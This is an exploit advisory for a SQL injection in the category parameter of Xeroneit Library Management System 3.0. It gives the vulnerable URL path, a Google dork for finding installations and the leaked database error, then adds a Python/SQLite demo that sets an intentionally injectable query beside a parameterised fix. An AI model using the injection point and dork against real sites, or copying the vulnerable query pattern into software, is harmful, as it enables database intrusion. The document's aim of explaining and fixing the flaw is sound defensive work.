# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection
# Google Dork: "LMS v3.0 - Xerone IT "
# Date: 2020-04-09
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link: https://xeroneit.net/portfolio/library-management-system-lms
# Software Demo: https://xeroneit.co/demo/lms/home/login
# Version: v3.0
# Category: webapps

1. Description

The script has SQLi in the books category page, at this path:

/lms/home/book?category_name=00*SQLI

The application returns the raw database error, which shows that the parameter is concatenated directly into the query:

Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3

SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as available_book, `book_info`.`number_of_books`, `book_info`.`id`, `book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as `size`, `book_info`.`publishing_year`, `book_info`.`publisher`, `book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`, `book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`, `book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'', category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21

Filename: models/Basic.php

Line Number: 284
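The error above shows the root cause: the category value from the request is spliced into the string literal inside FIND_IN_SET(...), so a single quote in it breaks the statement (the `'57''` in the query). The following is an added example, not code from the Xeroneit LMS, that reproduces that defect and its fix side by side. It uses Python with an in-memory SQLite database, a constructed sample `book_info` table, and a hand-written FIND_IN_SET (SQLite has no such function) that mirrors MySQL's semantics; the table columns are reduced to the ones the page's query actually filters on.

```python
import sqlite3

# Constructed sample rows standing in for the LMS book_info table:
# (id, category_id as MySQL-style comma-separated list, title)
SAMPLE_BOOKS = [
    (1, "57", "Intro to Security"),
    (2, "12,57", "Applied Crypto"),
    (3, "3", "Networking"),
]


def find_in_set(needle, haystack):
    """Re-implementation of MySQL FIND_IN_SET for SQLite: 1-based position of
    needle in the comma-separated list, 0 if absent, NULL if either is NULL."""
    if needle is None or haystack is None:
        return None
    parts = haystack.split(",")
    return parts.index(needle) + 1 if needle in parts else 0


def open_db():
    """Create the in-memory table and register FIND_IN_SET as a SQL function."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("FIND_IN_SET", 2, find_in_set)
    conn.execute(
        "CREATE TABLE book_info (id INTEGER, category_id TEXT, "
        "title TEXT, deleted TEXT DEFAULT '0')"
    )
    conn.executemany(
        "INSERT INTO book_info (id, category_id, title) VALUES (?, ?, ?)",
        SAMPLE_BOOKS,
    )
    return conn


def books_by_category_vulnerable(conn, category):
    """The pattern the page's error reveals: the request parameter becomes part
    of the SQL text, so a quote in it terminates the literal early."""
    sql = (
        "SELECT title FROM book_info WHERE FIND_IN_SET('" + category + "', category_id) != 0 "
        "AND deleted = '0' ORDER BY title ASC"
    )
    return [row[0] for row in conn.execute(sql)]


def books_by_category_safe(conn, category):
    """Hardened form: the value is bound as a parameter and never parsed as SQL."""
    sql = (
        "SELECT title FROM book_info WHERE FIND_IN_SET(?, category_id) != 0 "
        "AND deleted = '0' ORDER BY title ASC"
    )
    return [row[0] for row in conn.execute(sql, (category,))]


def probe(category):
    """Run both variants on the same input and return (vulnerable_outcome, safe_outcome).

    For the vulnerable variant a malformed statement is reported as a string
    beginning with 'syntax error', the same class of failure as the MySQL 1064
    error shown in the advisory; the safe variant simply finds no matching rows."""
    conn = open_db()
    try:
        vulnerable = books_by_category_vulnerable(conn, category)
    except sqlite3.OperationalError as exc:
        vulnerable = "syntax error: " + str(exc)
    safe = books_by_category_safe(conn, category)
    conn.close()
    return vulnerable, safe


if __name__ == "__main__":
    print(probe("57"))    # both variants return the two books in category 57
    print(probe("57'"))   # vulnerable variant fails to parse; safe one returns []
```

With the plain value `57` both functions return the same two titles; with the page's `57'` the concatenated query is unparseable, which is exactly the condition that produced the advisory's error page, while the bound-parameter query treats the quote as data. The same fix applies to the real application regardless of framework: pass the category through a bound parameter (or, for CodeIgniter-style query builders, through the builder's escaping) instead of string concatenation, and disable the verbose database error output in production so raw queries are not disclosed to clients.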